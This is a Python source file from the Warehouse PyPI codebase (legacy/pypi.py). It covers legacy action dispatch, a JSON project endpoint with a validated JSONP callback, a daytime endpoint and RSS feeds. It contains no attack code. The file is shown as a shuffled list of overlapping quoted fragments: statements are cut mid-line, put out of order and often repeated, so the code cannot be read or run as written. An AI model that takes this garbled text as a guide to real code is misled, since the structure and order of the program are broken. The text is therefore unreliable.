"if callback: data = '/**/ %s(%s);' % (callback, data) serial = app.db.packaging.get_last_serial() response",
") def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1,",
"is None: if not versions: raise NotFound(\"{} has no releases\".format(project_name)) version = versions[0]",
"arguments. This doesn't actually decorate the function or alter it in any way,",
"request) d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S'",
"under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES",
"legacy routing mapping. \"\"\" if name in _action_methods: raise KeyError('Attempt to re-register name",
"the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law",
"data = json.dumps(d, sort_keys=True) # write the JSONP extra crap if necessary if",
"project project = app.db.packaging.get_project(project_name) if project is None: raise NotFound(\"{} does not exist\".format(project_name))",
"app.db.packaging.get_recently_updated(num=40) for release in releases: # TODO update _force_external to _external when Flask-ification",
"\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express",
"serial) return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump the last",
"header too? return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump the",
"_external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url))",
"is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response( app,",
"projects', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in a",
"from warehouse.legacy import xmlrpc from warehouse.templates import render_response from warehouse.utils import cache, cors,",
"required by applicable law or agreed to in writing, software # distributed under",
"'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='package updates',",
"version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format)",
"d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls in d['releases'].items(): for url in urls:",
"@register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump the last N days' new",
"if action in _action_methods: return _action_methods[action](app, request) # No :action means we render",
"applicable law or agreed to in writing, software # distributed under the License",
"the index, or at least we redirect to where it # moved to",
"# Get the real project name for this project project = app.db.packaging.get_project(project_name) if",
"a :action parameter in the GET or POST arguments. This doesn't actually decorate",
"index, or at least we redirect to where it # moved to return",
"looking for the latest version versions = app.db.packaging.get_project_versions(project['name']) if version is None: if",
"or agreed to in writing, software # distributed under the License is distributed",
"last N days' new projects as an RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40)",
"= {} def register(name): \"\"\"Register a handler for a legacy :action style dispatch.",
")) def deco(fn): _action_methods[name] = fn return fn return deco def pypi(app, request):",
"means we render the index, or at least we redirect to where it",
"CONDITIONS OF ANY KIND, either express or implied. # See the License for",
"alter it in any way, it simply registers it with the legacy routing",
"callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name') # Get the real",
"# we're looking for the latest version versions = app.db.packaging.get_project_versions(project['name']) if version is",
"the last N days' updates as an RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40)",
"d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for",
"under the Apache License, Version 2.0 (the \"License\"); # you may not use",
"writing, software # distributed under the License is distributed on an \"AS IS\"",
"versions = app.db.packaging.get_project_versions(project['name']) if version is None: if not versions: raise NotFound(\"{} has",
"You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #",
"def packages_rss(app, request): \"\"\"Dump the last N days' new projects as an RSS",
"License. # You may obtain a copy of the License at # #",
"= versions[0] elif version not in versions: raise NotFound(\"{} has no release {}\".format(project_name,",
"<filename>warehouse/legacy/pypi.py # Copyright 2013 <NAME> # # Licensed under the Apache License, Version",
"NotFound(\"{} has no releases\".format(project_name)) version = versions[0] elif version not in versions: raise",
"info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for url in d['urls']:",
"if project is None: raise NotFound(\"{} does not exist\".format(project_name)) # we're looking for",
"return redirect( url_for( request, \"warehouse.views.index\", ), code=301, ) def daytime(app, request): response =",
"JSONP callback name') # Get the real project name for this project project",
"= Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1, varnish=120)",
"render_response( app, request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8'",
"compliance with the License. # You may obtain a copy of the License",
"= json.dumps(d, sort_keys=True) # write the JSONP extra crap if necessary if callback:",
"way, it simply registers it with the legacy routing mapping. \"\"\" if name",
"url in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) # write the",
"import fastly from warehouse.helpers import url_for from warehouse.http import Response from warehouse.legacy import",
"deco def pypi(app, request): # check for the legacy :action-style dispatch action =",
"for the specific language governing permissions and # limitations under the License. import",
"legacy PyPI was implemented using a :action parameter in the GET or POST",
"None: raise NotFound(\"{} does not exist\".format(project_name)) # we're looking for the latest version",
"= '/**/ %s(%s);' % (callback, data) serial = app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\")",
"of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable",
"response = render_response( app, request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, ) response.mimetype =",
"we render the index, or at least we redirect to where it #",
"projects as an RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release in releases:",
"\"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release in releases: # TODO update _force_external to",
"Copyright 2013 <NAME> # # Licensed under the Apache License, Version 2.0 (the",
"with the legacy routing mapping. \"\"\" if name in _action_methods: raise KeyError('Attempt to",
"'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='new projects', releases=releases,",
"release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, ) response.mimetype",
"early if callback is invalid callback = request.args.get('callback') if callback: if not is_valid_json_callback_name(callback):",
"project_json(app, request, project_name, version=None): # fail early if callback is invalid callback =",
"redirect to where it # moved to return redirect( url_for( request, \"warehouse.views.index\", ),",
"not use this file except in compliance with the License. # You may",
"it # moved to return redirect( url_for( request, \"warehouse.views.index\", ), code=301, ) def",
"permissions and # limitations under the License. import json import time from werkzeug.utils",
"has no releases\".format(project_name)) version = versions[0] elif version not in versions: raise NotFound(\"{}",
"License, Version 2.0 (the \"License\"); # you may not use this file except",
"deco(fn): _action_methods[name] = fn return fn return deco def pypi(app, request): # check",
"time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name,",
"not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name') # Get the real project name",
"distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY",
"language governing permissions and # limitations under the License. import json import time",
"daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\")",
"= url['upload_time'].strftime(time_format) for release, urls in d['releases'].items(): for url in urls: url['upload_time'] =",
"last N days' updates as an RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for",
"xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format =",
"version)) rpc = xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']),",
"serial = app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return",
"# you may not use this file except in compliance with the License.",
"was implemented using a :action parameter in the GET or POST arguments. This",
"agreed to in writing, software # distributed under the License is distributed on",
"This doesn't actually decorate the function or alter it in any way, it",
"_force_external to _external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True)",
"check for the legacy :action-style dispatch action = request.args.get(':action') if action in _action_methods:",
"version=None): # fail early if callback is invalid callback = request.args.get('callback') if callback:",
"urls in d['releases'].items(): for url in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d,",
"= url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\",",
"redirect( url_for( request, \"warehouse.views.index\", ), code=301, ) def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\",",
"(the \"License\"); # you may not use this file except in compliance with",
"a last-modified header too? return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request):",
"the legacy :action-style dispatch action = request.args.get(':action') if action in _action_methods: return _action_methods[action](app,",
"data = '/**/ %s(%s);' % (callback, data) serial = app.db.packaging.get_last_serial() response = Response(data,",
"action = request.args.get(':action') if action in _action_methods: return _action_methods[action](app, request) # No :action",
"# check for the legacy :action-style dispatch action = request.args.get(':action') if action in",
"the legacy routing mapping. \"\"\" if name in _action_methods: raise KeyError('Attempt to re-register",
"project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site,",
"site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in a last-modified header",
"# Unless required by applicable law or agreed to in writing, software #",
"warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods = {} def register(name): \"\"\"Register a handler",
"version not in versions: raise NotFound(\"{} has no release {}\".format(project_name, version)) rpc =",
"by applicable law or agreed to in writing, software # distributed under the",
"copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by",
"return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None): #",
"exist\".format(project_name)) # we're looking for the latest version versions = app.db.packaging.get_project_versions(project['name']) if version",
"releases = app.db.packaging.get_recently_updated(num=40) for release in releases: # TODO update _force_external to _external",
"crap if necessary if callback: data = '/**/ %s(%s);' % (callback, data) serial",
"the last N days' new projects as an RSS feed. \"\"\" releases =",
"License. import json import time from werkzeug.utils import redirect from werkzeug.exceptions import NotFound,",
"rss(app, request): \"\"\"Dump the last N days' updates as an RSS feed. \"\"\"",
"and # limitations under the License. import json import time from werkzeug.utils import",
"feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release in releases: # TODO update _force_external",
"is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response(",
"from warehouse.helpers import url_for from warehouse.http import Response from warehouse.legacy import xmlrpc from",
"app, request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' #",
"version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time']",
"file except in compliance with the License. # You may obtain a copy",
"if necessary if callback: data = '/**/ %s(%s);' % (callback, data) serial =",
"versions[0] elif version not in versions: raise NotFound(\"{} has no release {}\".format(project_name, version))",
") time_format = '%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release,",
"for release, urls in d['releases'].items(): for url in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data",
"# TODO: throw in a last-modified header too? return response @register('packages_rss') @cache(browser=1, varnish=120)",
"_force_external to _external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'],",
"the License. import json import time from werkzeug.utils import redirect from werkzeug.exceptions import",
"_force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, )",
"License for the specific language governing permissions and # limitations under the License.",
"or POST arguments. This doesn't actually decorate the function or alter it in",
"versions: raise NotFound(\"{} has no releases\".format(project_name)) version = versions[0] elif version not in",
"{}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version),",
"d['releases'].items(): for url in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) #",
"to in writing, software # distributed under the License is distributed on an",
"Response from warehouse.legacy import xmlrpc from warehouse.templates import render_response from warehouse.utils import cache,",
"implied. # See the License for the specific language governing permissions and #",
"\"License\"); # you may not use this file except in compliance with the",
"if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name') # Get the real project",
"obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless",
"in _action_methods: raise KeyError('Attempt to re-register name %r' % (name, )) def deco(fn):",
"routing mapping. \"\"\" if name in _action_methods: raise KeyError('Attempt to re-register name %r'",
"(callback, data) serial = app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\",",
"releases: # TODO update _force_external to _external when Flask-ification is done url =",
"actually decorate the function or alter it in any way, it simply registers",
"project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='package updates', releases=releases,",
"versions: raise NotFound(\"{} has no release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request) d",
"the real project name for this project project = app.db.packaging.get_project(project_name) if project is",
"request): \"\"\"Dump the last N days' new projects as an RSS feed. \"\"\"",
"or implied. # See the License for the specific language governing permissions and",
"# No :action means we render the index, or at least we redirect",
"Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None): # fail",
"throw in a last-modified header too? return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def",
"Apache License, Version 2.0 (the \"License\"); # you may not use this file",
"No :action means we render the index, or at least we redirect to",
"OR CONDITIONS OF ANY KIND, either express or implied. # See the License",
"may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #",
"\"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw",
"time from werkzeug.utils import redirect from werkzeug.exceptions import NotFound, BadRequest from warehouse import",
"last-modified header too? return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump",
"http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,",
"from werkzeug.utils import redirect from werkzeug.exceptions import NotFound, BadRequest from warehouse import fastly",
"in writing, software # distributed under the License is distributed on an \"AS",
"\"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release in releases: # TODO update _force_external to",
"for a legacy :action style dispatch. Most of the dispatch in legacy PyPI",
"POST arguments. This doesn't actually decorate the function or alter it in any",
"= app.db.packaging.get_project(project_name) if project is None: raise NotFound(\"{} does not exist\".format(project_name)) # we're",
"for release in releases: # TODO update _force_external to _external when Flask-ification is",
"real project name for this project project = app.db.packaging.get_project(project_name) if project is None:",
"# See the License for the specific language governing permissions and # limitations",
"the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR",
"description='package updates', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in",
"charset=utf-8' # TODO: throw in a last-modified header too? return response @register('packages_rss') @cache(browser=1,",
"is None: raise NotFound(\"{} does not exist\".format(project_name)) # we're looking for the latest",
"in d['releases'].items(): for url in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True)",
"Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response(",
"_force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, )",
"from warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods = {} def register(name): \"\"\"Register a",
"app.db.packaging.get_recent_projects(num=40) for release in releases: # TODO update _force_external to _external when Flask-ification",
"url['upload_time'].strftime(time_format) for release, urls in d['releases'].items(): for url in urls: url['upload_time'] = url['upload_time'].strftime(time_format)",
"# write the JSONP extra crap if necessary if callback: data = '/**/",
"json import time from werkzeug.utils import redirect from werkzeug.exceptions import NotFound, BadRequest from",
"latest version versions = app.db.packaging.get_project_versions(project['name']) if version is None: if not versions: raise",
"BadRequest from warehouse import fastly from warehouse.helpers import url_for from warehouse.http import Response",
"from warehouse import fastly from warehouse.helpers import url_for from warehouse.http import Response from",
"warehouse.legacy import xmlrpc from warehouse.templates import render_response from warehouse.utils import cache, cors, is_valid_json_callback_name",
"= app.db.packaging.get_project_versions(project['name']) if version is None: if not versions: raise NotFound(\"{} has no",
"TODO update _force_external to _external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail',",
"the Apache License, Version 2.0 (the \"License\"); # you may not use this",
"request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def",
"you may not use this file except in compliance with the License. #",
"registers it with the legacy routing mapping. \"\"\" if name in _action_methods: raise",
"= fn return fn return deco def pypi(app, request): # check for the",
"mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def",
"update _force_external to _external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'],",
"warehouse.http import Response from warehouse.legacy import xmlrpc from warehouse.templates import render_response from warehouse.utils",
"import json import time from werkzeug.utils import redirect from werkzeug.exceptions import NotFound, BadRequest",
"decorate the function or alter it in any way, it simply registers it",
"in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) # write the JSONP",
"in any way, it simply registers it with the legacy routing mapping. \"\"\"",
"use this file except in compliance with the License. # You may obtain",
"request) # No :action means we render the index, or at least we",
"request, \"warehouse.views.index\", ), code=301, ) def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return",
"at least we redirect to where it # moved to return redirect( url_for(",
"version = versions[0] elif version not in versions: raise NotFound(\"{} has no release",
"releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for",
"KeyError('Attempt to re-register name %r' % (name, )) def deco(fn): _action_methods[name] = fn",
"app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss')",
"url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls in d['releases'].items(): for url",
"when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response =",
"releases\".format(project_name)) version = versions[0] elif version not in versions: raise NotFound(\"{} has no",
"= app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response",
"# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may",
"sort_keys=True) # write the JSONP extra crap if necessary if callback: data =",
"moved to return redirect( url_for( request, \"warehouse.views.index\", ), code=301, ) def daytime(app, request):",
"import NotFound, BadRequest from warehouse import fastly from warehouse.helpers import url_for from warehouse.http",
"if name in _action_methods: raise KeyError('Attempt to re-register name %r' % (name, ))",
"name in _action_methods: raise KeyError('Attempt to re-register name %r' % (name, )) def",
"for url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls in d['releases'].items(): for",
"if callback is invalid callback = request.args.get('callback') if callback: if not is_valid_json_callback_name(callback): raise",
"@register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump the last N days' updates",
"2.0 (the \"License\"); # you may not use this file except in compliance",
"no releases\".format(project_name)) version = versions[0] elif version not in versions: raise NotFound(\"{} has",
"xmlrpc from warehouse.templates import render_response from warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods =",
"an RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release in releases: # TODO",
"fn return deco def pypi(app, request): # check for the legacy :action-style dispatch",
"pypi(app, request): # check for the legacy :action-style dispatch action = request.args.get(':action') if",
"= render_response( app, request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml;",
"JSONP extra crap if necessary if callback: data = '/**/ %s(%s);' % (callback,",
"fastly from warehouse.helpers import url_for from warehouse.http import Response from warehouse.legacy import xmlrpc",
"WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the",
"days' updates as an RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release in",
"least we redirect to where it # moved to return redirect( url_for( request,",
"= request.args.get('callback') if callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name') #",
"= app.db.packaging.get_recent_projects(num=40) for release in releases: # TODO update _force_external to _external when",
"\"\"\"Register a handler for a legacy :action style dispatch. Most of the dispatch",
"style dispatch. Most of the dispatch in legacy PyPI was implemented using a",
"in legacy PyPI was implemented using a :action parameter in the GET or",
"\"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw",
"# # Unless required by applicable law or agreed to in writing, software",
"# limitations under the License. import json import time from werkzeug.utils import redirect",
"dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for url in",
"express or implied. # See the License for the specific language governing permissions",
"callback = request.args.get('callback') if callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name')",
"release in releases: # TODO update _force_external to _external when Flask-ification is done",
"_action_methods[action](app, request) # No :action means we render the index, or at least",
"cors, is_valid_json_callback_name _action_methods = {} def register(name): \"\"\"Register a handler for a legacy",
"N days' new projects as an RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for",
"any way, it simply registers it with the legacy routing mapping. \"\"\" if",
"either express or implied. # See the License for the specific language governing",
"RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release in releases: # TODO update",
"in versions: raise NotFound(\"{} has no release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request)",
"# fail early if callback is invalid callback = request.args.get('callback') if callback: if",
"'text/xml; charset=utf-8' # TODO: throw in a last-modified header too? return response @register('packages_rss')",
"def register(name): \"\"\"Register a handler for a legacy :action style dispatch. Most of",
"Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not",
"an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either",
"import xmlrpc from warehouse.templates import render_response from warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods",
"@fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None): # fail early if callback is invalid",
"description='new projects', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in",
"_external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response",
"_action_methods = {} def register(name): \"\"\"Register a handler for a legacy :action style",
"code=301, ) def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors",
"action in _action_methods: return _action_methods[action](app, request) # No :action means we render the",
"cache, cors, is_valid_json_callback_name _action_methods = {} def register(name): \"\"\"Register a handler for a",
"= url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='new",
"GET or POST arguments. This doesn't actually decorate the function or alter it",
"in the GET or POST arguments. This doesn't actually decorate the function or",
"the License. # You may obtain a copy of the License at #",
"as an RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release in releases: #",
"2013 <NAME> # # Licensed under the Apache License, Version 2.0 (the \"License\");",
"# distributed under the License is distributed on an \"AS IS\" BASIS, #",
"or at least we redirect to where it # moved to return redirect(",
"varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump the last N days' updates as an",
"response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump the last N days'",
"is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF",
"time_format = '%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls",
"@cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None): # fail early if callback",
"response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump the last N days'",
"raise BadRequest('invalid JSONP callback name') # Get the real project name for this",
"function or alter it in any way, it simply registers it with the",
"the JSONP extra crap if necessary if callback: data = '/**/ %s(%s);' %",
"raise NotFound(\"{} has no release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request) d =",
"not in versions: raise NotFound(\"{} has no release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app,",
"done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request,",
"Get the real project name for this project project = app.db.packaging.get_project(project_name) if project",
"fail early if callback is invalid callback = request.args.get('callback') if callback: if not",
"redirect from werkzeug.exceptions import NotFound, BadRequest from warehouse import fastly from warehouse.helpers import",
"with the License. # You may obtain a copy of the License at",
"return _action_methods[action](app, request) # No :action means we render the index, or at",
"in a last-modified header too? return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app,",
"limitations under the License. import json import time from werkzeug.utils import redirect from",
"not versions: raise NotFound(\"{} has no releases\".format(project_name)) version = versions[0] elif version not",
"fn return fn return deco def pypi(app, request): # check for the legacy",
"= '%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls in",
"{} def register(name): \"\"\"Register a handler for a legacy :action style dispatch. Most",
"# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you",
"_action_methods[name] = fn return fn return deco def pypi(app, request): # check for",
"@cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None): # fail early if",
"an RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release in releases: # TODO",
"BadRequest('invalid JSONP callback name') # Get the real project name for this project",
"import render_response from warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods = {} def register(name):",
"from warehouse.http import Response from warehouse.legacy import xmlrpc from warehouse.templates import render_response from",
"project is None: raise NotFound(\"{} does not exist\".format(project_name)) # we're looking for the",
"@fastly.rss def packages_rss(app, request): \"\"\"Dump the last N days' new projects as an",
"law or agreed to in writing, software # distributed under the License is",
"legacy :action-style dispatch action = request.args.get(':action') if action in _action_methods: return _action_methods[action](app, request)",
"the License for the specific language governing permissions and # limitations under the",
"import Response from warehouse.legacy import xmlrpc from warehouse.templates import render_response from warehouse.utils import",
"under the License. import json import time from werkzeug.utils import redirect from werkzeug.exceptions",
"% (callback, data) serial = app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline'",
"the GET or POST arguments. This doesn't actually decorate the function or alter",
"governing permissions and # limitations under the License. import json import time from",
"the function or alter it in any way, it simply registers it with",
"we're looking for the latest version versions = app.db.packaging.get_project_versions(project['name']) if version is None:",
"on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,",
"version versions = app.db.packaging.get_project_versions(project['name']) if version is None: if not versions: raise NotFound(\"{}",
"app.db.packaging.get_project_versions(project['name']) if version is None: if not versions: raise NotFound(\"{} has no releases\".format(project_name))",
"return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump the last N",
"% (name, )) def deco(fn): _action_methods[name] = fn return fn return deco def",
"callback name') # Get the real project name for this project project =",
"to where it # moved to return redirect( url_for( request, \"warehouse.views.index\", ), code=301,",
"@cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump the last N days' new projects",
"\"warehouse.views.index\", ), code=301, ) def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response,",
